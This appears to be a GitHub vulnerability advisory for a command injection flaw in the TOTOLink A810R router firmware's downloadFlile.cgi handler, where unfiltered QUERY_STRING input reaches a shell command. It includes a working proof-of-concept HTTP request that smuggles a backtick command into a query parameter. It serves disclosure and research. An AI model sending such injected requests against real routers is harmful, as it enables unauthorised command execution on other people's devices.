Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

TOTOLink A810R V4.1.2cu.5182_B20201026 Has an command injection vulnerability

Overview

Description

1.Product Information:

TOTOLink A810R V4.1.2cu.5182_B20201026 router, the latest version of simulation overview:

Figure 1 Update date of the latest version of the firmware

(The latest version on the official website)

2. Vulnerability details

image-20220213004602767

TOTOLINK A810R V4.1.2cu.5182_B20201026 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.

Figure 2 Local of the vulnerability

We can see that the os will get QUERY_STRING without filter splice to the string echo QUERY_STRING:%s >/tmp/download and execute it. So, If we can control the QUERY_STRING, it can be command injection.

3. Recurring vulnerabilities and POC

In order to reproduce the vulnerability, the following steps can be followed:

  1. Boot the firmware by qemu-system or other ways (real machine)
  2. Attack with the following POC attacks
GET /cgi-bin/downloadFlile.cgi?payload=`ls>../1.txt` HTTP/1.1 
Host: 192.168.111.12 
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Connection: keep-alive 
Upgrade-Insecure-Requests: 1 
Cache-Control: max-age=0

Figure 3 POC attack effect

Figure 4 POC attack effect